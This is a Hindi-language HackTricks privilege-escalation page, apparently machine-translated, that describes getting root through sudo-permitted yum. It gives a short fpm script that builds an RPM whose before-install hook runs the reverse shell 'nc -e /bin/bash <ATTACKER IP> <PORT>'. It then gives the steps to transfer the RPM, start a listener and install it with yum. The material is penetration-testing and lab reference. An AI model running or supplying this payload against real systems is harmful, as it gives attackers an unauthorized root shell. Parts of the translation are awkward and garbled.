hacktricks/linux-unix/privilege-escalation/exploiting-yum.md

4.9 KiB

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

yum पर और उदाहरण भी देखें।

RPM पैकेज के माध्यम से अनियंत्रित कमांड्स का निष्पादन

पर्यावरण की जाँच

इस वेक्टर का उपयोग करने के लिए उपयोगकर्ता को उच्च विशेषाधिकारी, अर्थात् रूट के रूप में yum कमांड को निष्पादित करने की क्षमता होनी चाहिए।

इस वेक्टर का एक काम करने वाला उदाहरण

इस उत्पाद का एक काम करने वाला उदाहरण daily bugle कमरे में tryhackme पर पाया जा सकता है।

RPM पैकेजिंग

इस खंड में, मैं fpm का उपयोग करके RPM में एक रिवर्स शैल डालने का पैकेजिंग करने का वर्णन करूंगा।

नीचे दिया गया उदाहरण एक पैकेज बनाता है जिसमें एक बीफोर-इंस्टॉल ट्रिगर शामिल है जिसमें एक अनियंत्रित स्क्रिप्ट होता है जो हमलावर द्वारा परिभाषित किया जा सकता है। जब इसे स्थापित किया जाएगा, यह पैकेज अनियंत्रित कमांड को निष्पादित करेगा। मैंने एक सरल रिवर्स नेटकैट शैल उदाहरण का उपयोग डेमोंस्ट्रेशन के लिए किया है, लेकिन यह आवश्यकतानुसार बदला जा सकता है।

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

शैल को पकड़ना

उपरोक्त उदाहरण का उपयोग करते हुए और मानते हुए कि yum उच्च-अधिकाधिकारी उपयोगकर्ता के रूप में निष्पादित किया जा सकता है।

  1. रपी एम पी को होस्ट पर स्थानांतरित करें
  2. अपने स्थानीय होस्ट पर एक सुनने वाला शुरू करें जैसे कि उदाहरण नेटकैट सुनने वाला
  3. वंशवादी पैकेज yum localinstall -y exploited-1.0-1.noarch.rpm को स्थानीय इंस्टॉल करें